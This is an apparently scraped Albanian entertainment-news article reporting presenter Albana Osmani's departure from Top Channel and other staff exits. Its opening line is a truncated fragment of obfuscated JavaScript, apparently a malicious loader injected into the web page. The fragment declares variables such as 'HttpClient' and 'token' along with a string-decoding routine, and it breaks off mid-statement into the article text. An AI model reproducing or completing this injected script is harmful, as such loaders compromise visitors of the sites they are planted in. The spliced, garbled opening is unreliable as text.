;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Një nga prezantueset ikonë largohet nga Top Channel

By

Një prej figurave historike të Top Channel është larguar përfundimisht nga televizioni.

Fjala është për prezantuesen Albana Osmani e cila karrierën në ekran e nisi në një moshë fare të re për të shoqëruar shikuesit për vite me rradhë në formate të ndryshme, gjithmonë brenda familjes së Top Medias.

Lajmin e ka bërë të ditur portali Syri i cili mes tjerash bën me dije se Osmani do ta hedhë në gjyq televizionin në të cilin punoi për më shumë se 15 vite. Sipas portalit të njejtë, janë larguar pas debateve me Drejtorin Blushi edhe dy regjisorë të cilët kanë punuar në ekran që prej themelimit.

Në ndërkohë, largimi i Albanës është konfirmuar edhe nga burime të Prive.al.

‘Po, Albana është detyruar të largohet pas pakënaqësive të shumta. Përkundër faktit se është një prej ikonave të TOP-it, që prej verës së vitit të kaluar, ajo kishte ngelur pa asnjë program për ta prezantuar ndërsa ka prezantuese të reja që po i udhëheqin 2-3 formate paralelisht. Tashmë nga televizioni nuk përkrahet as fushata ‘Ti je një luledielli’ dhe i kanë hequr reklamën e fondacionit nga transmetimi’ – ka deklaruar burimi i rezervuar për Prive.al.

LAJMI VIJON NËN FOTO

Poashtu Prive.al mëson se në Maj është larguar edhe mjeshtri Bujar Kokonozi, i rikthyer në Shtator 2018 pas largimit teksa edhe 6 gazetarë të njohur të deskut informatik kanë lëvizur në ekrane të tjera duke e lënë departamentin e informacionit gati bosh.

Ka vite prej kur largimet nga TCH përcillen me shumë interes nga mediat në Shqipëri si një dramë e pafundme e një ekrani, dikur më i ndjekuri i të gjithë shqiptarëve e që nuk po e gjen asesi stabilitetin e nevojshëm përkundër tentativave për reformë dhe ndryshimeve të vazhdueshme në kupolën menaxhuese nga Presidentja Hoxha. /Prive.al

Artikuj të ngjashëm